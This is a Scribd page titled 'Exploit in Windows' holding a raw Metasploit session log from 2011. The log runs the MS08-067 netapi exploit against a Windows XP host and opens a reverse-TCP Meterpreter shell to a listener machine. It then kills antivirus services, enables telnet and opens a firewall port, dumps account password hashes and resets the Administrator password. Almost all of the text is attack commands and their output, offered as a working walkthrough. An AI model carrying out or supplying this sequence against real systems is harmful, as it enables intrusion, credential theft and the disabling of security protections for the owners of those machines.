Scribd Logo
Upload

Welcome to Scribd!

  • Exploit in Windows

    Uploaded by

    Mega Sirait
    25 views3 pages
    Meterpreter > run gettelnet -e [ ] Windows Telnet Server services service startup mode is not set to auto, changing it to au to. Opening port in local firewall if necessary.

    Original Description:

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    Meterpreter > run gettelnet -e [ ] Windows Telnet Server services service startup mode is not set to auto, changing it to au to. Opening port in local firewall if necessary.

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    25 views3 pages

    Exploit in Windows

    Uploaded by

    Mega Sirait
    Meterpreter > run gettelnet -e [ ] Windows Telnet Server services service startup mode is not set to auto, changing it to au to. Opening port in local firewall if necessary.

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 3

    msf > search netapi [*] Searching loaded modules for pattern 'netapi'...

    Exploits ========

    Name ----

    Disclosure Date Rank --------------- ---good great

    Description ----------Microsoft Workstation S Microsoft Server Servic

    windows/smb/ms03_049_netapi 2003-11-11 ervice NetAddAlternateComputerName Overflow windows/smb/ms06_040_netapi 2006-08-08 e NetpwPathCanonicalize Overflow windows/smb/ms06_070_wkssvc 2006-11-14 ervice NetpManageIPCConnect Overflow windows/smb/ms08_067_netapi 2008-10-28 e Relative Path Stack Corruption

    manual Microsoft Workstation S great Microsoft Server Servic

    msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOADS windows/meterpreter/reverse_tcp PAYLOADS => windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set RHOST 192.168.254.100 RHOST => 192.168.254.100 msf exploit(ms08_067_netapi) > set LHOST 192.168.254.17 LHOST => 192.168.254.17 msf exploit(ms08_067_netapi) > exploit

    [*] Started reverse handler on 192.168.254.17:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (749056 bytes) to 192.168.254.100

    [*] Meterpreter session 1 opened (192.168.254.17:4444 -> 192.168.254.100:2782) a t 2011-05-30 22:20:14 +0700

    meterpreter > run killav [*] Killing Antivirus services on the target... [*] Killing off avgrsx.exe... [*] Killing off nvsvc32.exe... [*] Killing off avgemc.exe... meterpreter > run gettelnet -e [*] Windows Telnet Server Enabler Meterpreter Script [*] Setting Telnet Server Services service startup mode [*] The Telnet Server Services service is not set to auto, changing it to au to ... [*] Opening port in local firewall if necessary

    [*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/scri pts/gettelnet/clean_up__20110530.2319.rc meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c08 9c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:eade9179ce44a99c0697a4bb62ac244a:91715c0aa4c55eb7937911f6319a 18b8::: sunset_master:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c0 89c0::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:772fddab19197f6b656d0be42 c157d2a::: meterpreter > execute -f cmd.exe -c Process 1124 created. Channel 4 created. meterpreter > interact 4 Interacting with channel 4...

    Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>net user Administrator password net user Administrator password The command completed successfully.

    You might also like